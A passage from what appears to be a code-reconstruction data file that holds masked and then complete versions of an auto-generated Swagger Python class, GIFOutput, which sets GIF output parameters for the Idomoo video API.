The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. 
Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. 
The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. 
* None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n <mask token>\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-3": "<mask token>\n\n\nclass GIFOutput(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. 
Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. 
The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. 
Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. 
The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. 
* None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n 
\"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-4": "<mask token>\n\n\nclass GIFOutput(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {'gif_fps': 'float', 'color_depth': 'float', 'gif_loop':\n 'int', 'height': 'float', 'start': 'float', 'duration': 'float',\n 'suffix': 'str', 'overlay': 'str', 'overlay_alignment': 'list[str]',\n 'overlay_scale': 'str', 'label': 'str'}\n attribute_map = {'gif_fps': 'gif_fps', 'color_depth': 'color_depth',\n 'gif_loop': 'gif_loop', 'height': 'height', 'start': 'start',\n 'duration': 'duration', 'suffix': 'suffix', 'overlay': 'overlay',\n 'overlay_alignment': 'overlay_alignment', 'overlay_scale':\n 'overlay_scale', 'label': 'label'}\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = 
overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. 
-1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. 
Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. 
The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. 
* Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both 
objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-5": "# coding: utf-8\n\n\"\"\"\n Idomoo API\n\n\n\n OpenAPI spec version: 2.0\n Contact: dev.support@idomoo.com\n\n\"\"\"\n\n\nimport pprint\n\nimport six\n\n\nclass GIFOutput(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'gif_fps': 'float',\n 'color_depth': 'float',\n 'gif_loop': 'int',\n 'height': 'float',\n 'start': 'float',\n 'duration': 'float',\n 'suffix': 'str',\n 'overlay': 'str',\n 'overlay_alignment': 'list[str]',\n 'overlay_scale': 'str',\n 'label': 'str'\n }\n\n attribute_map = {\n 'gif_fps': 'gif_fps',\n 'color_depth': 'color_depth',\n 'gif_loop': 'gif_loop',\n 'height': 'height',\n 'start': 'start',\n 'duration': 'duration',\n 'suffix': 'suffix',\n 'overlay': 'overlay',\n 'overlay_alignment': 'overlay_alignment',\n 'overlay_scale': 'overlay_scale',\n 'label': 'label'\n }\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None, height=None, start=None, duration=None,\n suffix=None, overlay=None, overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if 
overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\"Invalid value for `gif_fps`, must be a value less than or equal to `30`\")\n\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. 
-1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\"Invalid value for `gif_loop`, must be a value greater than or equal to `-1`\")\n\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError(\"Invalid value for `height`, must not be `None`\")\n\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError(\"Invalid value for `start`, must not be `None`\")\n\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this 